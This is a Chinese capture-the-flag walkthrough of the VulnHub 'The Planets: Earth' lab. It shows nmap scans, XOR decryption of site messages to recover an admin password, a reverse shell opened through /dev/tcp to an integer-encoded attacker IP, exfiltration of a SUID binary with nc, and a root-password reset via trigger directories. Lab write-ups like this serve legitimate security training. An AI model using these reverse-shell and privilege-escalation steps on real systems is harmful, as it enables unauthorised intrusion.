- 英文名称:The Planets: Earth
- 中文名称:行星:地球
- 发布日期:2021 年 11 月 2 日
- 难度:简单
- 描述:地球是一个简单的盒子,尽管您可能会发现它比本系列中的“水星”更具挑战性,并且根据您的经验,在简单的更难的一面。盒子上有两个标志:一个用户标志和一个包含 md5 哈希的根标志。这已经在 VirtualBox 上进行了测试,因此在 VMware 上可能无法正常工作。如有任何问题/问题或反馈,请发送电子邮件至:http://protonmail.com 上的 SirFlash,尽管我可能需要一段时间才能回复您。
- 下载地址:https://www.vulnhub.com/entry/the-planets-earth,755/
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
1、尝试发现IP地址,发现1个可疑IP
- earth.lan (192.168.199.179)
└─$ nmap -sP 192.168.199.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 13:21 CST
Nmap scan report for Hiwifi.lan (192.168.199.1)
Host is up (0.0027s latency).
Nmap scan report for 192.168.199.114
Host is up (0.0037s latency).
Nmap scan report for N3NXCV065297107.lan (192.168.199.151)
Host is up (0.0092s latency).
Nmap scan report for earth.lan (192.168.199.179)
Host is up (0.0020s latency).
Nmap scan report for kali.lan (192.168.199.247)
Host is up (0.00051s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.70 seconds 2、尝试对IP地址进行端口扫描,开放了22端口、80端口、443端口
$ nmap -A 192.168.199.179
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 13:28 CST
Nmap scan report for earth.lan (192.168.199.179)
Host is up (0.61s latency).
Not shown: 933 filtered tcp ports (no-response), 64 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_ 256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after: 2031-10-10T23:26:31
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time 3、准备对该网站进行页面暴力破解,需要先配置hosts文件
192.168.199.179 terratest.earth.local
192.168.199.179 earth.local 4、爆破结果如下,80端口有web后台,443端口有web首页和robots文件
---- Scanning URL: http://terratest.earth.local/ ----
+ http://terratest.earth.local/admin (CODE:301|SIZE:0)
+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521) 5、访问web页面,在robots.txt中寻找到 testingnotes.* 访问路径
首页
后台
robot.txt
6、顺着提示,进入testingnotes.txt 页面,得到2条线索
- 密钥线索:testdata.txt
- 用户名线索:terra
线索页面
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.
测试安全消息系统注意事项:
*使用 XOR 加密作为算法,在 RSA 中使用应该是安全的。
*地球已确认他们已收到我们发送的消息。
*testdata.txt 用于测试加密。
*terra 用作管理门户的用户名。
去做:
*我们如何安全地将我们的每月密钥发送到地球? 还是我们应该每周更换密钥?
*需要测试不同的密钥长度以防止暴力破解。 钥匙应该多长?
*需要改进消息界面和管理面板的界面,目前非常基础。 7、顺着线索,继续找
线索页面
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
根据辐射测年估计和其他证据,地球形成于 45 亿年前。
在地球历史的最初十亿年中,生命出现在海洋中并开始影响地球的大气和地表,导致厌氧生物和后来的需氧生物的扩散。
一些地质证据表明,生命可能早在 41 亿年前就已经出现。 8、在首页中发现,3段密文,需要根据上面的提示,计算出对应的明文
首页中的3段密文
Previous Messages:
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a 9、对首页中的3段消息,进行xor 解码,得到提示:earthclimatechangebad4humans
b'According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth\'s hisCfy //}omo;/ppeare\'2~d;\x7ff$\'x,\x7fjj=*alf3,oq|y$w6&|%Qjvw+U <@f;y/j\x7fkr0~h<Pj1s.=\x06i\x97\xf3\xdcs-q,<j${ugn$u6&\x7f*+o\'erlj|mnn/?;-\'\x7f1%,f{kx8.`\x7fb)"\x8c\xe5\x99np`ust*yzd1}xbi:o{)~sh},^6#Tjcy7aj,yn>Hhu-\x17skl)$In*\'y/dybj7pt4~u"t=5jgh&#yx*+fwi=/eapyrncanxky\x7f8/k<\x0b6=+1\x80\xe8\xdaq*Ir8xo"P|7wfbn'
b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the prol^rrlj~<evy\x7f{&*xk|h$kaw-oc 0-'web146iqc$hte7af#`ec~)o>kFnkukzdt|a>y~ciyvb~jn$6O?0i~\x7fd|0v|$lx4~%5l3d*`mx6a8{vcketdia %e,{tr9x>q{1w$h&v~oaxx-)if4tv6pudk"
b'earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat' 解码代码参考:
import binascii
import base64
data1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"
data2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
data3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
s1 = (hex(int(data1,16) ^ int(f,16)))
t1 = base64.b16decode(str(s1[2:]).upper())
s2 = (hex(int(data2,16) ^ int(f,16)))
t2 = base64.b16decode(str(s2[2:]).upper())
s3 = (hex(int(data3,16) ^ int(f,16)))
t3 = base64.b16decode(str(s3[2:]).upper())
print(t1)
print(t2)
print(t3) 10、拿着用户名+密码,成功登录测试页面,发现竟然是一个命令执行
测试后台页面
11、尝试通过nc反弹shell
攻击机:
nc -lvnp 4444
靶机:
bash -i >& /dev/tcp/3232286711/4444 0>&1 其中:3232286711 为 IP地址的整形转换,可参考代码:
import socket
import struct
ip = "192.168.199.247"
int_ip = socket.ntohl(struct.unpack("I",socket.inet_aton(str(ip)))[0])
print(int_ip) 成功拿到shell
反弹shell成功
12、尝试查找flag
find / -name "*flag*" 2>/dev/null 查找flag文件位置
得到flag潜藏的位置:
/var/earth_web/user_flag.txt 查看flag内容:
cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d] 13、继续寻找root用户的flag,查找具有suid权限的文件
bash-5.1$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1 执行/usr/bin/reset_root
bash-5.1$ /usr/bin/reset_root
/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
检查是否存在复位触发器...
重置失败,所有触发器都不存在。 14、将reset_root文件发回本地跟踪执行,这里使用nc文件传输功能
攻击机:
└─# nc -lvp 5555 >reset_root
listening on [any] 5555 ...
connect to [192.168.199.247] from terratest.earth.local [192.168.199.179] 53332
靶机:
bash-5.1$ nc 192.168.199.247 5555 < /usr/bin/reset_root
nc 192.168.199.247 5555 < /usr/bin/reset_root
15、在本地进行调试,发现缺少3个文件夹
- /dev/shm/kHgTFI5G
- /dev/shm/Zw7bV9U5
- /tmp/kcM0Wewe
┌──(root㉿kali)-[/home/ailx10]
└─# ./reset_root
zsh: 权限不够: ./reset_root
┌──(root㉿kali)-[/home/ailx10]
└─# ls -hl reset_root
-rw-r--r-- 1 root root 24K 8月 20 15:20 reset_root
┌──(root㉿kali)-[/home/ailx10]
└─# chmod +x reset_root
┌──(root㉿kali)-[/home/ailx10]
└─# ./reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
┌──(root㉿kali)-[/home/ailx10]
└─# strace reset_root
strace: Can't stat 'reset_root': 没有那个文件或目录
┌──(root㉿kali)-[/home/ailx10]
└─# strace ./reset_root
execve("./reset_root", ["./reset_root"], 0x7ffecb5955a0 /* 32 vars */) = 0
brk(NULL) = 0x7bd000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (没有那个文件或目录)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=87631, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 87631, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fe7b3a83000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0@y\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0\20\0\0\0\5\0\0\0GNU\0\2\200\0\300\4\0\0\0\1\0\0\0\0\0\0\0", 32, 848) = 32
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0?\323\315\324#\241\204X\331\333:^P\242\263\300"..., 68, 880) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=1904752, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe7b3a81000
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1938296, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fe7b38a7000
mprotect(0x7fe7b38cd000, 1724416, PROT_NONE) = 0
mmap(0x7fe7b38cd000, 1409024, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7fe7b38cd000
mmap(0x7fe7b3a25000, 311296, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x17e000) = 0x7fe7b3a25000
mmap(0x7fe7b3a72000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ca000) = 0x7fe7b3a72000
mmap(0x7fe7b3a78000, 33656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fe7b3a78000
close(3) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe7b38a5000
arch_prctl(ARCH_SET_FS, 0x7fe7b3a82580) = 0
mprotect(0x7fe7b3a72000, 12288, PROT_READ) = 0
mprotect(0x403000, 4096, PROT_READ) = 0
mprotect(0x7fe7b3ac8000, 8192, PROT_READ) = 0
munmap(0x7fe7b3a83000, 87631) = 0
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}, AT_EMPTY_PATH) = 0
brk(NULL) = 0x7bd000
brk(0x7de000) = 0x7de000
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK) = -1 ENOENT (没有那个文件或目录)
access("/dev/shm/Zw7bV9U5", F_OK) = -1 ENOENT (没有那个文件或目录)
access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (没有那个文件或目录)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0) = ?
+++ exited with 0 +++ 于是创建文件夹
bash-5.1$ mkdir dev/shm/kHgTFI5G
mkdir dev/shm/kHgTFI5G
bash-5.1$ mkdir /dev/shm/Zw7bV9U5
mkdir /dev/shm/Zw7bV9U5
bash-5.1$ mkdir /tmp/kcM0Wewe
mkdir /tmp/kcM0Wewe 16、再次尝试重置root密码
/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
检查是否存在复位触发器...
存在重置触发器,正在将根密码重置为:地球 得到root密码:Earth
17、切换到root用户,再次搜索flag
su -u root 切换到root
cat /root/root_flag.txt
_-o#&&*''''?d:>b\_
_o/"`'' '',, dMF9MMMMMHo_
.o&#' `"MbHMMMMMMMMMMMHo.
.o"" ' vodM*&HMMMMMMMMMM?.
,' $M&ood,~'`(&##MMMMMMH\
/ ,MMMMMMM#b?#bobMMMMHMMML
& ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
?$. :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
| |MMMMMMMMMMMMMMMMMMMMbMH' T,
$H#: `*MMMMMMMMMMMMMMMMMMMMb#}' `?
]MMH# ""*""""*#MMMMMMMMMMMMM' -
MMMMMb_ |MMMMMMMMMMMP' :
HMMMMMMMHo `MMMMMMMMMT .
?MMMMMMMMP 9MMMMMMMM} -
-?MMMMMMM |MMMMMMMMM?,d- '
:|MMMMMM- `MMMMMMMT .M|. :
.9MMM[ &MMMMM*' `' .
:9MMk `MMM#" -
&M} ` .-
`&. .
`~, . ./
. _ .-
'`--._,dd###pp=""'
Congratulations on completing Earth!
If you have any feedback please contact me at [email protected]
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
到此,实验完成~
发布于 2022-08-20 15:39